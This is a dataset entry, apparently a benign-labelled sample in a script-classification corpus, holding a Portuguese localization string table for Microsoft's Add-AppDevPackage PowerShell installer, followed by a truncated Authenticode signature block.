full_path
stringlengths 31
232
| filename
stringlengths 4
167
| content
stringlengths 0
48.3M
|
|---|---|---|
combined_dataset/train/non-malicious/sample_34_80.ps1
|
sample_34_80.ps1
|
# Localized 12/03/2020 06:20 PM (GMT) 303:4.80.0411 Add-AppDevPackage.psd1
# Culture = "en-US"
ConvertFrom-StringData @'
###PSLOC
PromptYesString=&Sim
PromptNoString=&Não
BundleFound=Encontrou o pacote: {0}
PackageFound=Encontrado o pacote: {0}
EncryptedBundleFound=Lote criptografado encontrado: {0}
EncryptedPackageFound=Pacote criptografado encontrado: {0}
CertificateFound=Encontrou o certificado: {0}
DependenciesFound=Encontrou pacotes de dependência:
GettingDeveloperLicense=Adquirindo licença de desenvolvedor...
InstallingCertificate=Instalando certificado...
InstallingPackage=\nInstalando aplicativo...
AcquireLicenseSuccessful=Uma licença de desenvolvedor foi adquirida com sucesso.
InstallCertificateSuccessful=O certificado foi instalado com êxito.
Success=\nSuccesso: o aplicativo foi instalado com êxito.
WarningInstallCert=\nVocê está prestes a instalar um certificado digital para o repositório de certificados de Pessoas Confiáveis do computador. Isso apresenta um sério risco de segurança e deve ser feito apenas se você confiar na origem desse certificado.\n\nQuando você terminar de usar este aplicativo, deve remover manualmente o certificado digital associado. Instruções sobre como fazer isso podem ser encontradas aqui: http://go.microsoft.com/fwlink/?LinkId=243053\n\nTem certeza de que deseja continuar?\n\n
ElevateActions=\nAntes de instalar esse aplicativo, você precisa fazer o seguinte:
ElevateActionDevLicense=\t- Adquirir uma licença de desenvolvedor
ElevateActionCertificate=\t- Instalar o certificado de autenticação
ElevateActionsContinue=Credenciais de administrador são necessárias para continuar. Aceite o prompt do UAC e forneça a senha do administrador, se solicitado.
ErrorForceElevate=Você deve fornecer credenciais de administrador para continuar. Execute este script sem o parâmetro -Force ou a partir de uma janela elevada do PowerShell.
ErrorForceDeveloperLicense=A aquisição de uma licença de desenvolvedor requer interação do usuário. Execute o script novamente sem o parâmetro -Force.
ErrorLaunchAdminFailed=Erro: não foi possível iniciar um novo processo como administrador.
ErrorNoScriptPath=Erro: você deve iniciar este script a partir de um arquivo.
ErrorNoPackageFound=Erro: nenhum pacote ou grupo encontrado no diretório do script. Verifique se o pacote ou grupo que você deseja instalar está colocado no mesmo diretório que o script.
ErrorManyPackagesFound=Erro: mais de um pacote ou grupo encontrado no diretório do script. Verifique se apenas o pacote ou grupo que você deseja instalar está colocado no mesmo diretório que o script.
ErrorPackageUnsigned=Erro: o pacote ou grupo não está assinado digitalmente ou sua assinatura está corrompida.
ErrorNoCertificateFound=Erro: nenhum certificado encontrado no diretório do script. Verifique se o certificado usado para assinar o pacote ou grupo sendo instalado está colocado no mesmo diretório que o script.
ErrorManyCertificatesFound=Erro: mais de um certificado encontrado no diretório do script. Verifique se somente o certificado usado para assinar o pacote ou o grupo sendo instalado está colocado no mesmo diretório que o script.
ErrorBadCertificate=Erro: o arquivo "{0}" não é um certificado digital válido. CertUtil retornou com o código de erro {1}.
ErrorExpiredCertificate=Erro: o certificado de desenvolvedor "{0}" expirou. Uma causa possível é que o relógio do sistema não está definido com a data e hora corretas. Se as configurações do sistema estiverem corretas, entre em contato com o proprietário do aplicativo para recriar um pacote ou grupo com um certificado válido.
ErrorCertificateMismatch=Erro: o certificado não corresponde ao usado para assinar o pacote ou grupo.
ErrorCertIsCA=Erro: o certificado não pode ser uma autoridade de certificação.
ErrorBannedKeyUsage=Erro: o certificado não pode ter o uso da seguinte chave: {0}. Uso de chave deve ser igual a "DigitalSignature" ou não especificado.
ErrorBannedEKU=Erro: o certificado não pode ter o seguinte uso estendido da chave: {0}. São permitidos apenas a Assinatura de Código e EKUs de Assinatura de Tempo de Vida.
ErrorNoBasicConstraints=Erro: o certificado não tem a extensão de restrições básicas.
ErrorNoCodeSigningEku=Erro: o certificado está faltando o uso estendido da chave de Assinatura de Código.
ErrorInstallCertificateCancelled=Erro: a instalação do certificado foi cancelada.
ErrorCertUtilInstallFailed=Erro: não foi possível instalar o certificado. CertUtil retornou com o código de erro {0}.
ErrorGetDeveloperLicenseFailed=Erro: não foi possível adquirir uma licença de desenvolvedor. Para obter mais informações, consulte http://go.microsoft.com/fwlink/?LinkID=252740.
ErrorInstallCertificateFailed=Erro: não foi possível instalar a licença de desenvolvedor. Status: {0}. Para obter mais informações, consulte http://go.microsoft.com/fwlink/?LinkID=252740.
ErrorAddPackageFailed=Erro: não foi possível instalar o aplicativo.
ErrorAddPackageFailedWithCert=Erro: não foi possível instalar o aplicativo. Para garantir a segurança, considere desinstalar o certificado de assinatura até que você possa instalar o aplicativo. Instruções para fazer isso podem ser encontradas aqui: :\nhttp://go.microsoft.com/fwlink/?LinkId=243053
'@
# SIG # Begin signature block
# MIInwgYJKoZIhvcNAQcCoIInszCCJ68CAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCQ+kquIKiMP1sk
# 28x5PgiDxzZrx02RUWnfYhigpt/1TKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGaIwghmeAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEICGjd/Gpe9H16zN1OxzSWI7+
# bJAlYVzmnwNrAcE9viubMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAOtYs0swjQRlInxVngjX3VYF584ZeS4OKVL9n1Okdv2rghF2cZy9Yi/4C
# G183MC/8B/BGQw0hMAI4FctxLCboSR1HeBkEuPCJRsoxY/QyiPwZGgLyHlxgqQZX
# lyFVPpVacYlzM6pEm27ZN0LgRiiMx0mnD6NhZjUoCE0RLQ9dDL7h6hC8hdZZNl5N
# MGBRXbwhZ1d4QXtJvdJBYWl6/YURW6llOGmfc0MXmnkxNzMMu7ObXUO0hwWDWzm6
# LrqwEaeM8om2WtouwcHKxS0Z0rxAwdmXMpUFJRgZjqQ/60ZodrmaV2lJj60iJPTu
# EKpxfOFHFpZa5FjgS6KztcTev9oh2qGCFywwghcoBgorBgEEAYI3AwMBMYIXGDCC
# FxQGCSqGSIb3DQEHAqCCFwUwghcBAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCDBDMF9Y+hiSeXN4cOEJZUb25jaC5pWKC6MZM1HuKJmOgIGZfxnFT1T
# GBMyMDI0MDQwNDIwNDIxMi41OThaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OjJBRDQtNEI5Mi1GQTAxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIRezCCBycwggUPoAMCAQICEzMAAAHenkielp8oRD0AAQAAAd4wDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzEyWhcNMjUwMTEwMTkwNzEyWjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoyQUQ0LTRC
# OTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALSB9ByF9UIDhA6xFrOniw/x
# sDl8sSi9rOCOXSSO4VMQjnNGAo5VHx0iijMEMH9LY2SUIBkVQS0Ml6kR+TagkUPb
# aEpwjhQ1mprhRgJT/jlSnic42VDAo0en4JI6xnXoAoWoKySY8/ROIKdpphgI7OJb
# 4XHk1P3sX2pNZ32LDY1ktchK1/hWyPlblaXAHRu0E3ynvwrS8/bcorANO6Djuysy
# S9zUmr+w3H3AEvSgs2ReuLj2pkBcfW1UPCFudLd7IPZ2RC4odQcEPnY12jypYPnS
# 6yZAs0pLpq0KRFUyB1x6x6OU73sudiHON16mE0l6LLT9OmGo0S94Bxg3N/3aE6fU
# bnVoemVc7FkFLum8KkZcbQ7cOHSAWGJxdCvo5OtUtRdSqf85FklCXIIkg4sm7nM9
# TktUVfO0kp6kx7mysgD0Qrxx6/5oaqnwOTWLNzK+BCi1G7nUD1pteuXvQp8fE1Kp
# TjnG/1OJeehwKNNPjGt98V0BmogZTe3SxBkOeOQyLA++5Hyg/L68pe+DrZoZPXJa
# GU/iBiFmL+ul/Oi3d83zLAHlHQmH/VGNBfRwP+ixvqhyk/EebwuXVJY+rTyfbRfu
# h9n0AaMhhNxxg6tGKyZS4EAEiDxrF9mAZEy8e8rf6dlKIX5d3aQLo9fDda1ZTOw+
# XAcAvj2/N3DLVGZlHnHlAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUazAmbxseaapg
# dxzK8Os+naPQEsgwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAOKUwHsXDacGOvUI
# gs5HDgPs0LZ1qyHS6C6wfKlLaD36tZfbWt1x+GMiazSuy+GsxiVHzkhMW+FqK8gr
# uLQWN/sOCX+fGUgT9LT21cRIpcZj4/ZFIvwtkBcsCz1XEUsXYOSJUPitY7E8bbld
# mmhYZ29p+XQpIcsG/q+YjkqBW9mw0ru1MfxMTQs9MTDiD28gAVGrPA3NykiSChvd
# qS7VX+/LcEz9Ubzto/w28WA8HOCHqBTbDRHmiP7MIj+SQmI9VIayYsIGRjvelmNa
# 0OvbU9CJSz/NfMEgf2NHMZUYW8KqWEjIjPfHIKxWlNMYhuWfWRSHZCKyIANA0aJL
# 4soHQtzzZ2MnNfjYY851wHYjGgwUj/hlLRgQO5S30Zx78GqBKfylp25aOWJ/qPhC
# +DXM2gXajIXbl+jpGcVANwtFFujCJRdZbeH1R+Q41FjgBg4m3OTFDGot5DSuVkQg
# jku7pOVPtldE46QlDg/2WhPpTQxXH64sP1GfkAwUtt6rrZM/PCwRG6girYmnTRLL
# sicBhoYLh+EEFjVviXAGTk6pnu8jx/4WPWu0jsz7yFzg82/FMqCk9wK3LvyLAyDH
# N+FxbHAxtgwad7oLQPM0WGERdB1umPCIiYsSf/j79EqHdoNwQYROVm+ZX10RX3n6
# bRmAnskeNhi0wnVaeVogLMdGD+nqMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtcwggJAAgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoy
# QUQ0LTRCOTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUAaKBSisy4y86pl8Xy22CJZExE2vOggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOm5WKQwIhgPMjAyNDA0MDUwMDQ5NDBaGA8yMDI0MDQwNjAwNDk0MFowdzA9Bgor
# BgEEAYRZCgQBMS8wLTAKAgUA6blYpAIBADAKAgEAAgIGzwIB/zAHAgEAAgIR+TAK
# AgUA6bqqJAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB
# AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAETWsZmA4SFylu2U
# 50Zg9cuRI4+t8afMv34B2RXd/d5JnHpcUaETz8lgNX/+HTD0SrALBaSZOB7BlOHu
# fsSxR4vKQed09vTJ/amFHb+6QtQwLxsJAbZ+GXEnYA4tsE2IPCElU7ffWIBxCAl1
# FWo3Y1n60XVsp7N1djPZNeU5TmO1MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAHenkielp8oRD0AAQAAAd4wDQYJYIZIAWUD
# BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B
# CQQxIgQgTB+K5Lha+oIp4CdvStGEbktq7XBneFEUGO605/j4VlcwgfoGCyqGSIb3
# DQEJEAIvMYHqMIHnMIHkMIG9BCCOPiOfDcFeEBBJAn/mC3MgrT5w/U2z81LYD44H
# c34dezCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u
